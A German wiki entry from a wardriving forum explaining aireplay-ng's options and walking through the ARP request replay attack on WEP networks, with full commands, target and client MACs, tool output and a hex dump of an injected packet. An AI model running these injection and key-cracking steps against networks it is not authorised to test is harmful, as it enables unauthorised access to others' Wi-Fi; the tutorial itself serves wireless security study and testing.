Aireplay-ng
Aus Wardriving-Forum.de Enzyklopädie
Inhaltsverzeichnis |
[Bearbeiten] Optionen
-0 <count>, --deauth=<count> Deauthenticate stations.
-1 <delay>, --fakeauth=<delay> Fake authentication with AP.
-2, --interactive Interactive frame selection.
-3, --arpreplay Standard ARP-request replay.
-4, --chopchop Decrypt/chopchop WEP packet.
-5, --fragment Generates a valid keystream.
-6 Caffe-latte Angriff
-7 Client Orientierter Fragmentation Angriff
-9, --test Tests injection and quality.
[Bearbeiten] ARP Request Replay Attack
[Bearbeiten] Beschreibung
Der klassische ARP-Request-Replay-Angriff ist mit die effektiveste Methode neue Initialisierungverktoren (IV) zu generieren und arbeitet sehr zuverlässig.
[aireplay-ng] loggt alle ARP-Anfragen und schickt diese Pakete wieder an den Accesspoint zurück. Das Programm schickt immer wieder die gleichen ARP-Anfragen und der Acesspoint antwortet darauf mit einem neuen ARP-Request mit neuen IVs. Je nach Anzahl der Pakete und IVs ist es möglich über kurz oder lang den Key zu errechnen.
[Bearbeiten] Was ist ARP?
Das Address Resolution Protocol (ARP) ist ein Netzwerkprotokoll, das die Zuordnung von Netzwerkadressen zu Hardwareadressen möglich macht. Obwohl es nicht auf Ethernet- und das IPv4-Protokoll beschränkt ist, wird es fast ausschließlich im Zusammenhang mit IPv4-Adressierung auf Ethernet-Netzen verwendet
[Bearbeiten] Anwendung
Beispiel:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Erklärung:
*-3 ist der Standard Arp-Request-Replay *-b 00:13:10:30:24:9C ist die MAC-Addresse des AP`s *-h 00:11:22:33:44:55 ist die Source MAC-Addresse (entweder ein aktiver Client oder aus einer [fake authentication]) *ath0 ist unser Adapter
Es gibt zwei Methoden eines ARP-Replays der zuvor injiziert wurde. Die erste und einfachste Methode ist die Verwendung des gleichen Befehl mit der Option "-r". Wir spielen dazu ein ARP-Paket aus unserer zuvor mit z.B. [airodump-ng] erstellten *.cap Datei ein in der wir einen erfolgreichen ARP-Replay gespeichert haben.
Beispiel:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
Erklärung:
*-3 ist der Standard Arp-Request-Replay *-b 00:13:10:30:24:9C ist die MAC-Addresse des AP`s *-h 00:11:22:33:44:55 ist die Source MAC-Addresse *-r replay_arp-0219-115508.cap ist die CAP-Datei aus erfolgreichem ARP-Replay *ath0 ist unser Adapter
Die zweite Methode ist ein Sonderfall der interaktiv Packet Replay-Attacke. Es handelt sich hierbei um eine Ergänzung zu der ARP-Requess-Replay-Attacke.
aireplay-ng -2 -r replay_arp-0219-115508.cap ath0
Erklärung:
*-2 ist die interactive frame selection *-r replay_arp-0219-115508.cap ist die CAP-Datei aus erfolgreichem ARP-Replay *ath0 ist unser Adapter
[Bearbeiten] Praxisanwendung
Bei allen Beispielen muss die Karte zuvor mit airmon-ng in den Monitor Mode versetzt werden. Ohne Monitor Mode ist keine Packet-Injection möglich.
Um folgenden Angriff auszuführen benötigen wir entweder die MAC-Adresse eines verbundenen Clients oder eine Fake-MAC aus dem fake_authentication Angriff. Am einfachsten ist ein verbundener Client dessen MAC wir zuvor mit airodump-ng herausgefunden haben. Der Acesspoint akzeptiert und antwortet nur auf Pakete eines verbundenen Clients. (Wegen dem Monitor Mode ist unsere MAC ja nicht mit dem AP verbunden).
Das kann jetzt einige Minuten dauern bis ein ARP-Request angezeigt wird. Sollte kein Traffic vorhanden sein,wird dieser Angriff ohne Erfolg bleiben.
Befehl:
aireplay-ng -3 -b 00:14:6c:7e:40:80 -h 00:0F:B5:88:AC:82 ath0
Das System antwortet:
Saving ARP requests in replay_arp-0219-123051.cap You should also start airodump-ng to capture replies. Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
Die letzte Zeile sieht etwa so aus:
Read 39 packets (got 0 ARP requests), sent 0 packets...
Wenn der Angriff läuft sollte sich die Anzahl der ARP-Request in dieser Zeile, nach einiger Zeit erhöhen. Das lässt sich auch gut mit airodump-ng anzeigen, die Pakete sollten nach einiger Zeit schnell ansteigen. (airodump-ng parallel laufen lassen um die Pakete wieder mitzuschneiden.)
Im zweiten Beispiel nutzen wir die CAP-Datei aus airodump-ng und spielen die ARP-Anfragen wieder an den Accesspoint zurück. (Wir hatten im Beispiel die *.cap-Datei "replay_arp-0219-123051.cap" mit [airodump-ng] erstellt.)
Die gefundenen ARP-Pakete schicken wir mit dem Parameter "-r" an den Accesspoint zurück:
aireplay-ng -2 -r replay_arp-0219-123051.cap ath0
Das System antwortet:
Size: 86, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0F:B5:88:AC:82
0x0000: 0841 0000 0014 6c7e 4080 000f b588 ac82 .A....l~@.......
0x0010: ffff ffff ffff 7092 e627 0000 7238 937c ......p..'..r8.|
0x0020: 8011 36c6 2b2c a79b 08f8 0c7e f436 14f7 ..6.+,.....~.6..
0x0030: 8078 a08e 207c 17c6 43e3 fe8f 1a46 4981 .x.. |..C....FI.
0x0040: 947c 1930 742a c85f 2699 dabe 1368 df39 .|.0t*._&....h.9
0x0050: ca97 0d9e 4731 ....G1
Use this packet ? y
Wir bestätigen mit "y" und unser System beginnt zu injecten.
Saving chosen packet in replay_src-0219-123117.cap You should also start airodump-ng to capture replies. Sent 3181 packets...
Alternativ können wir den Befehl noch genauer spezifizieren indem wir noch die MAC des AP`s (-b) und des Clients (-c) mitgeben:
aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 -r replay_arp-0219-115508.cap ath0
Wenn alles passt sollter der Zähler jetzt schnell steigen.
Nicht vergessen, airodump-ng laufen lassen um mitzuloggen!
airodump-ng -w replay_src-0219-123117.cap ath0
